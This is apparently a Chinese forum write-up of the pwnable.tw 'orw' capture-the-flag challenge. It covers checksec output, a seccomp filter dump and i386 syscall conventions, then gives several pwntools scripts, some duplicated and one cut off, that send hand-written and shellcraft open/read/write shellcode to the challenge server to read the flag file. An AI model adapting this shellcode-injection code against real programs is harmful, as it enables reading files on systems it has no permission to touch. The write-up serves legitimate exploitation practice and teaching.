Pwnable.tw orw writeup
发表于: 2021-6-15 15:39 20478


https://pwnable.tw/challenge/#2
图片描述

➜ orw checksec ./orw
[*] '/mnt/hgfs/share/ctf/tw/orw/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

图片描述

其中 seccomp 并不是一个普通的库函数,而是内核提供的系统调用过滤机制(程序通常通过 prctl/seccomp 系统调用安装一段 BPF 过滤器)。过滤器相当于为用户态划定了一份系统调用白名单,即题目所言【仅开启了 open、write、read】。不过从下面的规则 dump 可以看到两点值得注意:其一,白名单里实际上还包括 exit、exit_group、sigreturn、rt_sigreturn,而不在白名单中的调用并不会让进程被杀死,只是直接返回 ERRNO(38)(即 ENOSYS),所以 shellcode 只能依赖这几个调用,并且应当检查返回值;其二,规则 0001 对非 i386 架构的调用直接跳到 ALLOW,也就是说这份过滤器只约束 32 位调用——在 64 位内核上,若进程能切换到 64 位模式执行 syscall,这条规则就管不到了。本题用不到这一点,但审计 seccomp 规则时应检查架构不匹配的分支返回的是 KILL 还是 ALLOW。
可以使用工具查看seccomp保护规则
https://github.com/david942j/seccomp-tools
安装方法
sudo apt install gcc ruby-dev
sudo gem install seccomp-tools
使用方法
➜ orw seccomp-tools dump ./orw

0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011
0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011
0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011
0006: 0x15 0x04 0x00 0x00000001 if (A == exit) goto 0011
0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011
0008: 0x15 0x02 0x00 0x00000003 if (A == read) goto 0011
0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011
0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38)
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW

简单分析函数可知,该程序直接执行了用户输入的 shellcode(checksec 中的 NX disabled / Has RWX segments 也印证了这一点)。结合题目意思,可以先用 open 打开 flag 文件,然后 read 读出文件内容,最后 write 输出到标准输出;这里的 open/read/write 指的都是通过 int 0x80 发起的裸系统调用,而不是 libc 函数。
使用的python程序如下:

使用pwntools的shellcraft来构造shellcode。
图片描述
当然也可以自己写:前提是需要对 i386 系统调用的参数传递比较熟悉——eax 为系统调用号(open=5、read=3、write=4、exit=1,与上面 seccomp dump 中的编号一致),ebx、ecx、edx 依次为前三个参数(更多参数依次放在 esi、edi、ebp),用 int 0x80 触发;返回值放在 eax 中,为负数时表示 -errno,所以写 shellcode 时最好先检查 open/read 的返回值再继续。

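from pwn import *
context(arch='i386', os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw', 10001)
# https://docs.pwntools.com/en/stable/shellcraft.html

# The seccomp filter dumped above whitelists open/read/write plus exit and
# exit_group; anything else merely returns ENOSYS, so the shellcode is limited
# to exactly these calls and must check their return values itself.
FLAG_PATH = '/home/orw/flag'
BUF_SIZE = 0x100  # bytes reserved for the flag; read length and write cap

s = ''
# open(FLAG_PATH, O_RDONLY) -> eax = fd, or -errno on failure
s += shellcraft.open(FLAG_PATH)
# A negative eax means open() failed; leave via the whitelisted exit() instead
# of calling read() on a bogus fd.
s += 'test eax, eax\n'
s += 'js fail\n'
# Carve a scratch buffer BELOW the current stack pointer. The original read
# into ebp, which overwrites the caller's saved ebp / return address (which is
# presumably why it had to end in an infinite loop rather than return).
# shellcraft.mov keeps the encoded immediate free of NUL bytes.
s += shellcraft.mov('ecx', BUF_SIZE)
s += 'sub esp, ecx\n'
s += 'mov esi, esp\n'  # esi survives int 0x80, so it can name the buffer twice
# read(fd, buf, BUF_SIZE) -> eax = bytes actually read (0 on EOF, -errno on error)
s += shellcraft.read('eax', 'esi', BUF_SIZE)
s += 'test eax, eax\n'
s += 'jle fail\n'
# write(1, buf, eax): emit only the bytes read() returned instead of a fixed
# 0x100, so no uninitialised stack bytes are dumped after the flag.
s += shellcraft.write(1, 'esi', 'eax')
# exit(0) is on the whitelist; terminating cleanly replaces the original
# `next: jmp next` spin loop and lets recvall() below see EOF.
s += shellcraft.exit(0)
s += 'fail:\n'
s += shellcraft.exit(1)

io.recvuntil(':')
io.send(asm(s))
# Collect everything the shellcode wrote until the remote closes the socket.
print(io.recvall(timeout=5).decode(errors='replace'))
io.close()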
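from pwn import *
context(arch='i386', os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw', 10001)
# https://docs.pwntools.com/en/stable/shellcraft.html

# The seccomp filter dumped above whitelists open/read/write plus exit and
# exit_group; anything else merely returns ENOSYS, so the shellcode is limited
# to exactly these calls and must check their return values itself.
FLAG_PATH = '/home/orw/flag'
BUF_SIZE = 0x100  # bytes reserved for the flag; read length and write cap

s = ''
# open(FLAG_PATH, O_RDONLY) -> eax = fd, or -errno on failure
s += shellcraft.open(FLAG_PATH)
# A negative eax means open() failed; leave via the whitelisted exit() instead
# of calling read() on a bogus fd.
s += 'test eax, eax\n'
s += 'js fail\n'
# Carve a scratch buffer BELOW the current stack pointer. The original read
# into ebp, which overwrites the caller's saved ebp / return address (which is
# presumably why it had to end in an infinite loop rather than return).
# shellcraft.mov keeps the encoded immediate free of NUL bytes.
s += shellcraft.mov('ecx', BUF_SIZE)
s += 'sub esp, ecx\n'
s += 'mov esi, esp\n'  # esi survives int 0x80, so it can name the buffer twice
# read(fd, buf, BUF_SIZE) -> eax = bytes actually read (0 on EOF, -errno on error)
s += shellcraft.read('eax', 'esi', BUF_SIZE)
s += 'test eax, eax\n'
s += 'jle fail\n'
# write(1, buf, eax): emit only the bytes read() returned instead of a fixed
# 0x100, so no uninitialised stack bytes are dumped after the flag.
s += shellcraft.write(1, 'esi', 'eax')
# exit(0) is on the whitelist; terminating cleanly replaces the original
# `next: jmp next` spin loop and lets recvall() below see EOF.
s += shellcraft.exit(0)
s += 'fail:\n'
s += shellcraft.exit(1)

io.recvuntil(':')
io.send(asm(s))
# Collect everything the shellcode wrote until the remote closes the socket.
print(io.recvall(timeout=5).decode(errors='replace'))
io.close()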
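from pwn import *
context(arch='i386', os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw', 10001)
# https://docs.pwntools.com/en/stable/shellcraft.html

# Hand-written equivalent of the shellcraft version. i386 int 0x80 convention:
# eax = syscall number (open=5, read=3, write=4, exit=1, matching the seccomp
# dump above), arguments in ebx, ecx, edx; the result comes back in eax, a
# negative value meaning -errno. Immediates are loaded NUL-free (push/pop,
# xor + mov to the high byte) so the payload contains no zero bytes.
s = ''
s += '''
        /* open(file='/home/orw/flag', oflag=0, mode=0) */
        /* push "/home/orw/flag" followed by a NUL; the NUL is produced by the
           xor so the shellcode itself contains no zero bytes */
        push 0x1010101
        xor dword ptr [esp], 0x1016660
        push 0x6c662f77
        push 0x726f2f65
        push 0x6d6f682f
        mov ebx, esp
        xor ecx, ecx
        xor edx, edx
        /* call open() */
        push 5 /* SYS_open */
        pop eax
        int 0x80
        /* open() returns -errno on failure: do not read() from a bogus fd */
        test eax, eax
        js fail
'''

s += '''
        /* read(fd=eax, buf=<scratch buffer below esp>, nbytes=0x100) */
        mov ebx, eax
        /* reserve 0x100 bytes below esp for the flag instead of using ebp:
           reading into ebp would overwrite the caller's saved ebp / return
           address. ecx = 0x100 is built without a NUL byte in the encoding. */
        xor ecx, ecx
        mov ch, 0x100 >> 8
        sub esp, ecx
        mov ecx, esp
        mov esi, esp /* esi keeps the buffer address across the syscalls */
        xor edx, edx
        mov dh, 0x100 >> 8
        /* call read() */
        push 3 /* SYS_read */
        pop eax
        int 0x80
        /* eax = bytes read; 0 (empty file) or negative (error) is a failure */
        test eax, eax
        jle fail
'''

s += '''
        /* write(fd=1, buf=esi, n=<bytes read>) -- write exactly what read()
           returned rather than a fixed 0x100, so no stale stack bytes follow
           the flag */
        mov edx, eax
        mov ecx, esi
        push 1
        pop ebx
        /* call write() */
        push 4 /* SYS_write */
        pop eax
        int 0x80
'''

s += '''
        /* exit(0): allowed by the filter; terminating cleanly replaces the
           original `next: jmp next` spin loop and gives recvall() an EOF */
        xor ebx, ebx
        push 1 /* SYS_exit */
        pop eax
        int 0x80
fail:
        /* exit(1) on any syscall failure above */
        push 1
        pop ebx
        push 1 /* SYS_exit */
        pop eax
        int 0x80
'''

io.recvuntil(':')
io.send(asm(s))
# Collect everything the shellcode wrote until the remote closes the socket.
print(io.recvall(timeout=5).decode(errors='replace'))
io.close()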
from pwn import *
context(arch='i386',os='linux')
context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
#https://docs.pwntools.com/en/stable/shellcraft.html
s = ''
s+='''
 /* open(file='/home/orw/flag', oflag=0, mode=0) */
        /* push b'/home/orw/flag\x00' */
        push 0x1010101
        xor dword ptr [esp], 0x1016660
        push 0x6c662f77
        push 0x726f2f65
        push 0x6d6f682f
        mov ebx, esp
        xor ecx, ecx
        xor edx, edx
        /* call open() */
        push 5 /* 5 */


最新回复 (1)
为什么官方给的文件本地调试bss段没有执行权限??
2021-12-7 21:46